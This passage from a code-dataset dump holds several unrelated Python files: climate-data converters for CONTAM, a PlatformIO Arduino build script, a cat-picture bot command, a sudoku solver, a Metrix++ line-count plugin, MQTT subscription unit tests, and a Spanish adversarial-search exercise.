a valid computer for access to MACA data. Try again...')\n sys.exit()\n if ((year>=1996) and (year<=2006)):\n yearstr = '_1995_2006.csv'\n elif ((year>=2010) and (year<=2020)):\n yearstr = '_2009_2020.csv'\n elif ((year>=2030) and (year<=2040)):\n yearstr = '_2029_2040.csv'\n elif ((year>=2044) and (year<=2056)):\n yearstr = '_2044_2056.csv'\n elif ((year>=2086) and (year<=2095)):\n yearstr = '_2085_2096.csv'\n elif ((year>=2096) and (year<=2098)):\n yearstr = '_2089_2099.csv'\n else:\n print('Incorrect year. Try again...')\n return\n \n # Create dataframes from desired data files.\n tasmax = pd.read_csv(directory + city.city + '_tasmax_' + str(rcp) + yearstr, index_col='time', parse_dates=True)\n tasmin = pd.read_csv(directory + city.city + '_tasmin_' + str(rcp) + yearstr, index_col='time', parse_dates=True)\n huss = pd.read_csv(directory + city.city + '_huss_' + str(rcp) + yearstr, index_col='time', parse_dates=True)\n pr = pd.read_csv(directory + city.city + '_pr_' + str(rcp) + yearstr, index_col='time', parse_dates=True)\n uas = pd.read_csv(directory + city.city + '_uas_' + str(rcp) + yearstr, index_col='time', parse_dates=True)\n vas = pd.read_csv(directory + city.city + '_vas_' + str(rcp) + yearstr, index_col='time', parse_dates=True)\n \n # Create DAILY time series for the desired year and model.\n b = str(year)+'-01-01'\n e = str(year+1)+'-01-01' \n Ps = 101325. * (1 - 2.25577e-5 * city.altitude)**5.25588 # Very simple conversion from altitude to pressure; https://www.engineeringtoolbox.com/air-altitude-pressure-d_462.html\n Tmax = tasmax[b:e][model]\n Tmin = tasmin[b:e][model]\n #Tavg = pd.concat((Tmax,Tmin),axis=1).mean(axis=1)\n Hr = huss[b:e][model] / (1 - huss[b:e][model]) * 1000. # convert from specific humidity to mixing ratio, then from kg kg-1 to g kg-1.\n prcp = pr[b:e][model]\n wspd = (uas[b:e][model]**2 + vas[b:e][model]**2)**0.5\n wdir = np.arctan2(uas[b:e][model],vas[b:e][model])\n wdir[wdir>=0.] = wdir[wdir>=0.]*180/np.pi\n wdir[wdir<0.] = 360. 
+ (wdir[wdir<0.]*180/np.pi)\n daily = pd.DataFrame({'Ps': Ps,\n 'Tmax': Tmax,\n 'Tmin': Tmin,\n 'prcp': prcp,\n 'wspd': wspd,\n 'wdir': wdir,\n 'Hr': Hr},\n index=Tmax.index).tz_localize(city.time_zone)\n \n # Creates a weather dataframe with an HOURLY timescale; winds and RH are interpolated.\n time = pd.date_range(str(year)+'-01-01',str(year)+'-12-31 23',freq='H',tz=city.time_zone)\n wth = pd.DataFrame({'Pb':daily.Ps.resample('H').ffill(),\n 'Ws':daily.wspd.resample('H').interpolate(),\n 'Wd':daily.wdir.resample('H').interpolate(),\n 'Hr':daily.Hr.resample('H').interpolate()},\n index=time)\n \n # Generate time series of daily max and min temperatures (for interpolation).\n t = []\n T = []\n for day in daily.itertuples():\n sunrise, noon, sunset = solar_times(city, day.Index.to_pydatetime())\n t.append(sunrise)\n T.append(day.Tmin)\n t.append(noon+pd.Timedelta('3 hours')) # This is a guess as to when Tmax occurs.\n T.append(day.Tmax)\n\n x = np.array([time.timestamp() for time in wth.index])\n xp = np.array([time.timestamp() for time in t])\n fp = np.array(T)\n Ta = np.interp(x,xp,fp,fp[0],fp[-1])\n wth['Ta'] = Ta\n \n return wth\n\ndef writeContamWeatherFile(wthrFile, df):\n \"\"\"\n This function writes the data in the pandas dataframe, df, to a text file.\n The text file is formatted as a CONTAM weather file.\n \n Written by Von P. Walden\n Washington State University\n Laboratory for Atmospheric Research\n 2 Jun 2017\n \"\"\"\n # Open new weather file.\n fp = open(wthrFile, 'w')\n \n # Write the first header lines.\n fp.write('WeatherFile ContamW 2.0\\n\\n');\n fp.write(df.index[0].to_pydatetime().strftime('%m/%d') + '\t !start-of-file date\\n');\n fp.write(df.index[-1].to_pydatetime().strftime('%m/%d') + '\t !end-of-file date\\n');\n fp.write('!Date\tDofW\tDtype\tDST\tTgrnd [K]\\n');\n \n # Write daily average data.\n dfa = df.resample('1D').mean()\n for day in dfa.index:\n fp.write( day.strftime('%m/%d') + '\\t' \n + str(day.weekday()+1) + '\\t'\n + str(day.weekday()+1) + '\\t{0:2d}\\t{1:10.2f}\\n'.format(day.timetuple().tm_isdst,dfa.loc[day]['Ta']))\n \n # Write the second header line.\n fp.write('!Date\tTime\tTa [K]\tPb [Pa]\tWs [m/s]\tWd [deg]\tHr [g/kg]\tIth [kJ/m^2]\tIdn [kJ/m^2]\tTs [K]\tRn [-]\tSn [-]\\n');\n\n # Write the hourly data.\n for hour in df.index:\n fp.write( hour.strftime('%m/%d') + '\\t'\n + hour.strftime('%H:%M:%S') \n + '\\t{0:10.2f}\\t{1:10.2f}\\t{2:10.2f}\\t{3:10.2f}\\t{4:10.2f}\\t{5:10.2f}\\t{6:10.2f}\\t{7:10.2f}\\t{8:10.2f}\\t{9:10.2f}\\n'.format(df.loc[hour]['Ta'],df.loc[hour]['Pb'],df.loc[hour]['Ws'],df.loc[hour]['Wd'],df.loc[hour]['Hr'],0.,0.,0.,0.,0.))\n \n # Close the weather file.\n fp.close()\n \n return\n\ndef writeContamSpeciesFile(specFile, df):\n \"\"\"\n This function writes the data in the pandas dataframe, df, to a text file.\n The text file is formatted as a CONTAM species file.\n\n \"\"\"\n # Open new file.\n fp = open(specFile, 'w')\n \n # Write the first header lines.\n fp.write('SpeciesFile ContamW 2.0 ! 
file and version identification\\n\\n\\n');\n fp.write(df.index[0].to_pydatetime().strftime('%m/%d') + '\\t');\n fp.write(df.index[-1].to_pydatetime().strftime('%m/%d') + '\\t' + str(len(df.columns)) + '\\n');\n fp.write('\\t'.join(df.columns.values.tolist()) + '\\n');\n # Write the df.\n for hour in df.index:\n fp.write( hour.strftime('%m/%d') + '\\t'\n + hour.strftime('%H:%M:%S') + '\\t'\n + '\\t'.join([str(x) for x in df.loc[hour].values.tolist()]) +'\\n')\n \n # Close the file.\n fp.close()\n \n return\n\n","sub_path":"python/contam_input.py","file_name":"contam_input.py","file_ext":"py","file_size_in_byte":25242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"287258290","text":"# Copyright 2019-present PlatformIO \n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"\nArduino\n\nArduino Wiring-based Framework allows writing cross-platform software to\ncontrol devices attached to a wide range of Arduino boards to create all\nkinds of creative coding, interactive objects, spaces or physical experiences.\n\nhttp://arduino.cc/en/Reference/HomePage\n\"\"\"\n\nimport sys\nfrom os.path import isdir, isfile, join\n\nfrom SCons.Script import DefaultEnvironment\n\nenv = DefaultEnvironment()\nplatform = env.PioPlatform()\n\nFRAMEWORK_DIR = platform.get_package_dir(\"framework-arduino-megaavr\")\nassert isdir(FRAMEWORK_DIR)\n\nboard = env.BoardConfig()\nbuild_core = board.get(\"build.core\", \"\")\n\nCPPDEFINES = [\n \"ARDUINO_ARCH_MEGAAVR\",\n (\"ARDUINO\", 10808)\n]\n\nif \"build.usb_product\" in board:\n CPPDEFINES += [\n (\"USB_VID\", board.get(\"build.hwids\")[0][0]),\n (\"USB_PID\", board.get(\"build.hwids\")[0][1]),\n (\"USB_PRODUCT\", '\\\\\"%s\\\\\"' %\n board.get(\"build.usb_product\", \"\").replace('\"', \"\")),\n (\"USB_MANUFACTURER\", '\\\\\"%s\\\\\"' %\n board.get(\"vendor\", \"\").replace('\"', \"\"))\n ]\n\nenv.SConscript(\"_bare.py\", exports=\"env\")\n\nenv.Append(\n CPPDEFINES=CPPDEFINES,\n\n CPPPATH=[\n join(FRAMEWORK_DIR, \"cores\", build_core, \"api\", \"deprecated\"),\n join(FRAMEWORK_DIR, \"cores\", build_core)\n ],\n\n LIBSOURCE_DIRS=[\n join(FRAMEWORK_DIR, \"libraries\")\n ]\n)\n\n# Bootloader and fuses for uploading purposes\nbootloader_config = board.get(\"bootloader\", {})\nif \"BOOTLOADER_CMD\" not in env:\n if env.subst(\"$BOARD\") == \"uno_wifi_rev2\":\n bootloader_path = join(\n FRAMEWORK_DIR, \"bootloaders\", board.get(\"bootloader.file\", \"\"))\n if isfile(bootloader_path):\n env.Replace(BOOTLOADER_CMD='-Uflash:w:\"%s\":i' % bootloader_path)\n else:\n sys.stderr.write(\n \"Error: Couldn't find bootloader image %s\\n\" % bootloader_path)\n env.Exit(1)\n\nif \"FUSES_CMD\" not in env:\n for fuse in (\"OSCCFG\", \"SYSCFG0\", \"BOOTEND\"):\n if not bootloader_config.get(fuse, \"\"):\n sys.stderr.write(\"Error: Missing %s fuse value\\n\" % fuse)\n env.Exit(1)\n\n env.Replace(\n FUSES_CMD=\"-Ufuse2:w:%s:m -Ufuse5:w:%s:m -Ufuse8:w:%s:m\" % (\n bootloader_config.get(\"OSCCFG\"),\n 
bootloader_config.get(\"SYSCFG0\"),\n bootloader_config.get(\"BOOTEND\")\n )\n )\n\n#\n# Target: Build Core Library\n#\n\nlibs = []\n\nif \"build.variant\" in board:\n variants_dir = join(\n \"$PROJECT_DIR\", board.get(\"build.variants_dir\")) if board.get(\n \"build.variants_dir\", \"\") else join(FRAMEWORK_DIR, \"variants\")\n\n env.Append(\n CPPPATH=[\n join(variants_dir, board.get(\"build.variant\"))\n ]\n )\n env.BuildSources(\n join(\"$BUILD_DIR\", \"FrameworkArduinoVariant\"),\n join(variants_dir, board.get(\"build.variant\"))\n )\n\nenv.BuildSources(\n join(\"$BUILD_DIR\", \"FrameworkArduino\"),\n join(FRAMEWORK_DIR, \"cores\", build_core)\n)\n\nenv.Prepend(LIBS=libs)\n","sub_path":"builder/frameworks/arduino.py","file_name":"arduino.py","file_ext":"py","file_size_in_byte":3565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"556587058","text":"# Cat plugin\n# Commands:\n# - /cat\n# Configuration: None\n\nimport requests\nfrom .basic import CommandBase, CommandInfo, bot_command\n\nclass Cat(CommandBase):\n name = \"Cat\"\n safename = \"cat\"\n def __init__(self, logger):\n super().__init__(logger)\n self.to_register = [\n CommandInfo(\"cat\", self.execute, \"Displays a random cat image.\")\n ]\n def get_help_msg(self, cmd):\n return \"Call /cat with no arguments.\"\n @bot_command\n def execute(self, bot, update, args):\n data = requests.head(\"https://api.thecatapi.com/api/images/get\")\n bot.send_photo(chat_id = update.message.chat_id, \n photo = data.headers[\"Location\"],\n disable_notification = True)\n","sub_path":"commands/cat.py","file_name":"cat.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"337173467","text":"def print_board(board):\n for row in range(9):\n for col in range(9):\n print(board[row][col], end=' ')\n print()\n\ndef check_empty(board, loc):\n for row in range(9):\n for col in range(9):\n if board[row][col]==0:\n loc[0]=row\n loc[1]=col\n return True\n return False\n\ndef check_row(board, row, num):\n for i in range(9):\n if board[row][i]==num:\n return False\n return True\n\ndef check_column(board, col, num):\n for i in range(9):\n if board[i][col]==num:\n return False\n return True\n\ndef check_box(board, row, col, num):\n for i in range(3):\n for j in range(3):\n if board[i+(row-row%3)][j+(col-col%3)]==num:\n return False\n return True\n\ndef check_all(board, row, col, num):\n return check_row(board, row, num) and check_column(board, col, num) and check_box(board, row, col, num)\n\n\ndef solve(board):\n\n loc = [0, 0]\n\n if not check_empty(board, loc):\n return True\n\n row, col = loc[0], loc[1]\n\n for num in range(1, 10):\n if check_all(board, row, col, num):\n board[row][col]=num\n if solve(board):\n return True\n board[row][col]=0\n return False\n\nif __name__ == \"__main__\":\n\n board = [[5,3,0,0,7,0,0,0,0],\n [6,0,0,1,9,5,0,0,0],\n [0,9,8,0,0,0,0,6,0],\n [8,0,0,0,6,0,0,0,3],\n [4,0,0,8,0,3,0,0,1],\n [7,0,0,0,2,0,0,0,6],\n [0,6,0,0,0,0,2,8,0],\n [0,0,0,4,1,9,0,0,5],\n [0,0,0,0,8,0,0,7,9]]\n\n if solve(board):\n print_board(board)\n else:\n print('No solution exists')\n","sub_path":"solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":1717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"558987840","text":"#\r\n# Metrix++, Copyright 2009-2019, Metrix++ Project\r\n# Link: https://github.com/metrixplusplus/metrixplusplus\r\n# 
\r\n# This file is a part of Metrix++ Tool.\r\n# \r\n\r\nfrom metrixpp.mpp import api\r\nimport re\r\n\r\nclass Plugin(api.Plugin, api.MetricPluginMixin, api.Child, api.IConfigurable):\r\n \r\n def declare_configuration(self, parser):\r\n parser.add_option(\"--std.code.lines.code\", \"--sclc\", action=\"store_true\", default=False,\r\n help=\"Enables collection of lines of code metric (per region detalization) - \"\r\n \"number of non-empty lines of code, excluding comments \"\r\n \"[default: %default]\")\r\n parser.add_option(\"--std.code.lines.preprocessor\", \"--sclp\", action=\"store_true\", default=False,\r\n help=\"Enables collection of lines of preprocessor code metric (per region detalization) - \"\r\n \"number of non-empty lines of preprocessor code \"\r\n \"[default: %default]\")\r\n parser.add_option(\"--std.code.lines.comments\", \"--sclcom\", action=\"store_true\", default=False,\r\n help=\"Enables collection of lines of comments metric (per region detalization) - \"\r\n \"number of non-empty lines of comments \"\r\n \"[default: %default]\")\r\n parser.add_option(\"--std.code.lines.total\", \"--sclt\", action=\"store_true\", default=False,\r\n help=\"Enables collection of total lines metric (per region detalization) - \"\r\n \"number of any type of lines (blank, code, comments, etc.)\"\r\n \"[default: %default]\")\r\n \r\n def configure(self, options):\r\n self.is_active_code = options.__dict__['std.code.lines.code']\r\n self.is_active_preprocessor = options.__dict__['std.code.lines.preprocessor']\r\n self.is_active_comments = options.__dict__['std.code.lines.comments']\r\n self.is_active_total = options.__dict__['std.code.lines.total']\r\n \r\n pattern_line = re.compile(r'''[^\\s].*''')\r\n\r\n def initialize(self):\r\n self.declare_metric(self.is_active_code,\r\n self.Field('code', int),\r\n self.pattern_line,\r\n api.Marker.T.CODE | api.Marker.T.STRING,\r\n merge_markers=True)\r\n self.declare_metric(self.is_active_preprocessor,\r\n self.Field('preprocessor', int),\r\n self.pattern_line,\r\n api.Marker.T.PREPROCESSOR)\r\n self.declare_metric(self.is_active_comments,\r\n self.Field('comments', int),\r\n self.pattern_line,\r\n api.Marker.T.COMMENT)\r\n self.declare_metric(self.is_active_total,\r\n self.Field('total', int),\r\n self.pattern_line,\r\n api.Marker.T.ANY,\r\n merge_markers=True)\r\n\r\n super(Plugin, self).initialize(fields=self.get_fields())\r\n\r\n if self.is_active() == True:\r\n self.subscribe_by_parents_interface(api.ICode)\r\n","sub_path":"metrixpp/ext/std/code/lines.py","file_name":"lines.py","file_ext":"py","file_size_in_byte":3194,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"277427632","text":"from logging import NOTSET\nfrom time import sleep, time\nfrom typing import Protocol\nimport unittest\nfrom unittest.case import expectedFailure\nimport paho.mqtt.client as mqtt\nimport os\n\n\ndef write_file(data):\n with open('log', 'w', encoding='utf-8')as f:\n f.write(data)\n\n\ndef read_file():\n with open('log', 'r')as f:\n data = f.read()\n return data\n\n\ndef initClient():\n return mqtt.Client(client_id=\"client_sub\", clean_session=None, userdata=None, protocol=mqtt.MQTTv311,\n transport=\"tcp\")\n\n\n# The callback for when the client receives a CONNACK response from the server.\n\n\ndef on_connect(client, userdata, flags, rc):\n data = \"Client:(\" + str(client._client_id, encoding=\"utf-8\") + \\\n \") connected broker with result: \" + mqtt.connack_string(rc)\n\n\ndef on_subscribe(client, 
userdata, mid, granted_qos):\n    data = \"Client:(\" + str(client._client_id, encoding=\"utf-8\") + \\\n           \") with Qos \" + str(granted_qos[0]) + \" successfully\"\n    write_file(data)\n\n\ndef get_subscribe_str(client_id, qos):\n    return \"Client:(\" + client_id + \") with Qos \" + str(qos) + \" successfully\"\n\n\ndef on_unsubscribe(client, userdata, mid):\n    data = \"Client:(\" + str(client._client_id, encoding=\"utf-8\") + \\\n           \") unsubscribed successfully\"\n    write_file(data)\n\n\ndef get_unsubscribe_str(client_id):\n    return \"Client:(\" + client_id + \") unsubscribed successfully\"\n\n\ndef on_message(client, userdata, msg):\n    data = \"Client:(\" + str(client._client_id, encoding=\"utf-8\") + \\\n           \") received message: \" + str(msg.payload) + \" from topic \" + msg.topic\n    write_file(data)\n\n\ndef get_message(client_id, msg, topic):\n    return \"Client:(\" + client_id + \") received message: b'\" + str(msg) + \"' from topic \" + topic\n\n\ndef on_disconnect(client, userdata, rc):\n    if rc != 0:\n        data = \"Unexpected disconnection.\"\n    else:  # without this else, the success message unconditionally clobbered the error message above\n        data = \"Client:(\" + str(client._client_id,\n                                encoding=\"utf-8\") + \") disconnect successfully\"\n\n\ndef client_init(name_str, url, port):\n    client = mqtt.Client(client_id=name_str, clean_session=True,\n                         userdata=None, protocol=mqtt.MQTTv311, transport=\"tcp\")\n    client.on_connect = on_connect\n    client.on_subscribe = on_subscribe\n    client.on_unsubscribe = on_unsubscribe\n    client.on_message = on_message\n    client.on_disconnect = on_disconnect\n    client.connect(url, port)\n    return client\n\n\ndef loop(client=None, topic=\"\"):\n    if client is None:\n        os.system('mosquitto_pub -t ' + topic + ' -h localhost -m \"' + topic + '\"')\n        return\n    client.loop_start()\n    if topic != \"\":\n        os.system('mosquitto_pub -t ' + topic + ' -h localhost -m \"' + topic + '\"')\n    sleep(1)\n    client.loop_stop()\n\n\nclass TestSubUnit(unittest.TestCase):\n    url = \"127.0.0.1\"\n    port = 1883\n    new_topic = \"c\"\n    exist_topic = \"test\"\n    common_topic = \"hello\"\n    qos0 = 0\n    qos1 = 1\n    qos2 = 2\n    qos_error = 3\n\n    def test_server_no_topic(self):\n        client_id = \"test_server_no_topic\"\n        qos = self.qos0\n        client = client_init(client_id, self.url, self.port)\n        client.subscribe(self.new_topic, qos=qos)\n\n        loop(client)\n        self.assertEqual(read_file(), get_subscribe_str(client_id, qos))\n\n        client.unsubscribe(self.new_topic)\n\n        loop(client)\n        self.assertEqual(read_file(), get_unsubscribe_str(client_id))\n\n        client.disconnect()\n\n    def test_server_exist_topic(self):\n        client_id = \"test_server_exist_topic\"\n        qos = self.qos0\n        client = client_init(client_id, self.url, self.port)\n        client.subscribe(self.exist_topic, qos=qos)\n\n        loop(client)\n        self.assertEqual(read_file(), get_subscribe_str(client_id, qos))\n\n        client.unsubscribe(self.exist_topic)\n        client.disconnect()\n\n    def test_multiple_topic(self):\n        client_id = \"test_multiple_topic\"\n        qos = self.qos0\n        client = client_init(client_id, self.url, self.port)\n        client.subscribe([(self.exist_topic, qos), (self.common_topic, qos)])\n\n        loop(client)\n        self.assertEqual(read_file(), get_subscribe_str(client_id, qos))\n\n        loop(client, self.exist_topic)\n        self.assertEqual(read_file(), get_message(client_id, self.exist_topic, self.exist_topic))\n\n        loop(client, self.common_topic)\n        self.assertEqual(read_file(), get_message(client_id, self.common_topic, self.common_topic))\n\n        client.unsubscribe(self.exist_topic)\n\n        loop(client)\n        self.assertEqual(read_file(), get_unsubscribe_str(client_id))\n\n        client.unsubscribe(self.common_topic)\n\n        loop(client)\n        
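# (Added note: read_file() returns whatever the last MQTT callback wrote; loop() spins the network thread for about one second via loop_start/sleep(1)/loop_stop, giving the broker's UNSUBACK callback time to fire before this assertion.)\n        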
self.assertEqual(read_file(), get_unsubscribe_str(client_id))\n\n client.disconnect()\n\n def test_publish_without_subscribe(self):\n loop(topic=self.exist_topic)\n\n client_id = \"test_publish_without_subscribe\"\n qos = self.qos0\n\n client = client_init(\n \"test_publish_without_subscribe\", self.url, self.port)\n client.subscribe(self.exist_topic, qos=self.qos0)\n\n loop(client)\n self.assertEqual(read_file(), get_subscribe_str(client_id, qos))\n\n client.unsubscribe(self.exist_topic)\n client.disconnect()\n\n def test_recv_message_once(self):\n client_id = \"test_recv_message_once\"\n qos = self.qos0\n\n client = client_init(client_id, self.url, self.port)\n client.subscribe(self.common_topic, qos=qos)\n\n loop(client, self.common_topic)\n self.assertEqual(read_file(), get_message(\n client_id, self.common_topic, self.common_topic))\n\n client.unsubscribe(self.common_topic)\n client.disconnect()\n\n def test_recv_message_multiple(self):\n client_id = \"test_recv_message_multiple\"\n qos = self.qos0\n client = client_init(client_id, self.url, self.port)\n client.subscribe([(self.exist_topic, qos), (self.common_topic, qos)])\n\n loop(client, self.exist_topic)\n self.assertEqual(read_file(), get_message(\n client_id, self.exist_topic, self.exist_topic))\n\n loop(client, self.common_topic)\n self.assertEqual(read_file(), get_message(\n client_id, self.common_topic, self.common_topic))\n\n client.unsubscribe(self.exist_topic)\n client.unsubscribe(self.common_topic)\n client.disconnect()\n\n def test_recv_message_main_topic(self):\n client_id_a = \"test_recv_message_main_topic_a\"\n client_id_b = \"test_recv_message_main_topic_b\"\n qos = self.qos0\n client_a = client_init(client_id_a, self.url, self.port)\n client_b = client_init(client_id_b, self.url, self.port)\n\n client_a.subscribe(self.common_topic + '/a', qos)\n client_b.subscribe(self.common_topic + '/b', qos)\n\n client_a.loop_start()\n client_b.loop_start()\n\n os.system('mosquitto_pub -t ' + self.common_topic+'/a' + ' -h localhost -m \"' + self.common_topic+'/a' + '\"')\n\n sleep(1)\n\n self.assertEqual(read_file(), get_message(\n client_id_a, self.common_topic + '/a', self.common_topic + '/a'))\n\n os.system(\n 'mosquitto_pub -t ' + self.common_topic + '/b' + ' -h localhost -m \"' + self.common_topic + '/b' + '\"')\n\n sleep(1)\n\n self.assertEqual(read_file(), get_message(\n client_id_b, self.common_topic + '/b', self.common_topic + '/b'))\n\n client_a.loop_stop()\n client_b.loop_stop()\n\n client_a.unsubscribe(self.common_topic + '/a')\n client_b.unsubscribe(self.common_topic + '/b')\n client_a.disconnect()\n client_b.disconnect()\n\n def test_recv_message_sub_topic(self):\n client_id = \"test_recv_message_sub_topic\"\n qos = self.qos0\n client = client_init(client_id, self.url, self.port)\n client.subscribe(self.common_topic, qos=qos)\n\n loop(client, self.common_topic)\n self.assertEqual(read_file(), get_message(\n client_id, self.common_topic, self.common_topic))\n\n client.unsubscribe(self.common_topic)\n client.disconnect()\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"paho-mqtt-py/test_sub.py","file_name":"test_sub.py","file_ext":"py","file_size_in_byte":8134,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"101884297","text":"from easydict import EasyDict\nfrom typing import Union\nfrom pathlib import Path\n\nfrom vortex.utils.common import check_and_create_output_dir\nfrom vortex.core.factory import 
create_model,create_dataset,create_exporter\nfrom vortex.predictor import create_predictor\nfrom vortex.core.pipelines.base_pipeline import BasePipeline\n\n__all__ = ['GraphExportPipeline']\n\nclass GraphExportPipeline(BasePipeline):\n \"\"\"Vortex Graph Export Pipeline API\n \"\"\"\n\n def __init__(self,\n config: EasyDict, \n weights : Union[str,Path,None] = None):\n \"\"\"Class initialization\n\n Args:\n config (EasyDict): dictionary parsed from Vortex experiment file\n weights (Union[str,Path,None], optional): path to selected Vortex model's weight. If set to None, it will \\\n assume that final model weights exist in **experiment directory**. \\\n Defaults to None.\n \n Example:\n ```python\n from vortex.utils.parser import load_config\n from vortex.core.pipelines import GraphExportPipeline\n \n # Parse config\n config = load_config('experiments/config/example.yml')\n graph_exporter = GraphExportPipeline(config=config,\n weights='experiments/outputs/example/example.pth')\n ```\n \"\"\"\n \n # Configure output directory\n self.experiment_directory, _ = check_and_create_output_dir(config)\n self.experiment_name = config.experiment_name\n\n # Initialize Pytorch model\n if weights is None:\n state_dict = self.experiment_directory / '{}.pth'.format(self.experiment_name)\n else:\n state_dict = weights\n model_components = create_model(config.model,state_dict=state_dict,stage='validate')\n model_components.network = model_components.network.eval()\n self.predictor = create_predictor(model_components).eval()\n self.image_size = config.model.preprocess_args.input_size\n\n # Initialize dataset train to get class_names\n dataset = create_dataset(config.dataset,\n preprocess_config=config.model.preprocess_args, \n stage='train'\n )\n self.class_names = dataset.dataset.class_names if hasattr(dataset.dataset, 'class_names') else None\n\n # Initialize export config\n self.export_configs = [config.exporter] \\\n if not isinstance(config.exporter, list) \\\n else config.exporter\n\n def run(self,\n example_input : Union[str,Path,None] = None) -> EasyDict :\n \"\"\"Function to execute the graph export pipeline\n\n Args:\n example_input (Union[str,Path,None], optional): path to example input image to help graph tracing. 
Defaults to None.\n\n        Returns:\n            EasyDict: dictionary containing status of the export process\n        \n        Example:\n            ```python\n            example_input = 'image1.jpg'\n            graph_exporter = GraphExportPipeline(config=config,\n                                                 weights='experiments/outputs/example/example.pth')\n\n            result = graph_exporter.run(example_input=example_input)\n            ```\n        \"\"\"\n        outputs = []\n        ok = True\n        for export_config in self.export_configs :\n            exporter = create_exporter(\n                config=export_config,\n                experiment_name=self.experiment_name,\n                image_size=self.image_size,\n                output_directory=(self.experiment_directory),\n            )\n            ok = exporter(\n                predictor=self.predictor,\n                class_names=self.class_names,\n                example_image_path=example_input\n            ) and ok\n            outputs.append(str(exporter.filename))\n        print('model is exported to:', ' and '.join(outputs))\n        # TODO specify which export is failed\n        result = EasyDict({'export_status' : ok})\n        return result","sub_path":"vortex/core/pipelines/export_pipeline.py","file_name":"export_pipeline.py","file_ext":"py","file_size_in_byte":4122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"130603890","text":"import numpy as np\nimport argparse\nfrom PIL import Image, ImageStat, ImageMath\nimport math\n\nparser = argparse.ArgumentParser()\nparser.add_argument('fname')\nparser.add_argument('pref', default=\"\", nargs=\"?\")\nargs = parser.parse_args()\n\nim = Image.open(args.fname)\nRGB = im.convert('RGB')\n\nimWidth, imHeight = im.size\n\nratg = 1.2\nratgb = 1.66\nming = 10\nratr = 2\nspeed = 8\n\nGI = 0\ntotal = 0\n\n# Accumulate 2G - R - B (commonly called the excess-green index, ExG)\n# over a grid of pixels sampled every `speed` pixels in x and y.\nfor i in range(0, int(imWidth/speed)):\n\tfor j in range(0, int(imHeight/speed)):\n\t\tR,G,B = RGB.getpixel((i*speed,j*speed))\n\t\tGI += 2*G - R - B\n\t\ttotal = total + 1\n\nprint(\"GreenIndex=\"+str(float(GI)/total))\n","sub_path":"DistributedRL/Aggregator/build/Code/sim/Parser/greenIndex/GreenIndex.py","file_name":"GreenIndex.py","file_ext":"py","file_size_in_byte":594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"209517487","text":"## AIA\n## Adversarial search\n## Dpto. de C. de la Computación e I.A. (Univ. de Sevilla)\n## ===================================================================\n\n## In this exercise set we implement the minimax algorithm and\n## minimax with alpha-beta pruning to decide the next move in an\n## adversarial search problem.\n\n## ==================================================================\n## Representing adversarial search problems\n## ==================================================================\n\n## Recall that, as seen in class, implementing the representation of\n## a game consists of:\n\n## * Representing states and moves with some data structure.\n## * Defining: es_estado_final(_), es_estado_ganador(_,_,_),\n##   movimientos(_), aplica(_,_), f_utilidad(_,_), and f_evaluacion(_,_)\n## * Defining: estado_inicial, minimo_valor and maximo_valor\n\n## ==================================================================\n## Exercise 1\n## ==================================================================\n\n## Define in Python a class Juego that represents an adversarial\n## search problem. 
The class must have the following\n## attributes:\n\n## - estado_inicial: initial state of the game.\n## - estado_final: final state of the game (when it is unique).\n## - maximo_valor: upper bound of the values of the static\n##   evaluation function\n## - minimo_valor: lower bound of the values of the static\n##   evaluation function\n\n## and the following methods:\n\n## - movimientos(estado): list of the moves applicable to 'estado'.\n## - aplica(movimiento,estado): state that results from applying\n##   'movimiento' to 'estado'.\n## - es_estado_final(estado): checks whether 'estado' is a final state\n##   of the game. By default it compares against the final state.\n## - es_estado_ganador(estado,turno,jugador): checks whether 'jugador'\n##   wins the game in 'estado' when it is 'turno''s turn to move.\n## - f_evaluacion(estado,turno): returns the value associated with\n##   'estado' when it is 'turno''s turn to play. By default it is\n##   defined as the utility function for final states and 0 in any\n##   other case.\n## - str_estado(estado): returns a string representation of 'estado'.\n## - str_movimiento(movimiento): returns a string representation of\n##   'movimiento'.\n\n## The constructor of the class receives the initial state, the final\n## state (when the latter is unique) and the maximum and minimum\n## values of the evaluation function (by default, infinity and\n## -infinity respectively).\n\n\nclass juego:\n\n    def __init__(self, estado_inicial, estado_final=None,\n                 maximo_valor=float(\"inf\"), minimo_valor=-float(\"inf\")):\n\n        self.estado_inicial = estado_inicial\n        self.estado_final = estado_final\n        self.maximo_valor = maximo_valor\n        self.minimo_valor = minimo_valor\n\n    def es_estado_final(self, estado):\n        return estado==self.estado_final\n\n    def movimientos(self, estado):  # renamed from 'movimiento' to match the spec above and the Nim subclass below\n        pass\n\n    def aplica(self, mov, estado):\n        pass\n    \n    def es_estado_ganador(self, estado, turno, jugador):\n        pass\n    \n    def f_evaluacion(self, estado, turno):\n\n        if self.es_estado_ganador(estado, turno, \"MAX\"):\n            return self.maximo_valor\n        elif self.es_estado_ganador(estado, turno, \"MIN\"):\n            return self.minimo_valor\n        else:\n            return 0\n\n    def str_estado(self, estado):\n        return str(estado)\n\n    \n    def str_movimiento(self, mov):\n        return str(mov)\n\n\n
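## (Added note: a concrete game normally only needs to override\n## movimientos, aplica and es_estado_ganador; f_evaluacion, str_estado\n## and str_movimiento already have usable defaults, as the Nim\n## implementation below illustrates.)\n\n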
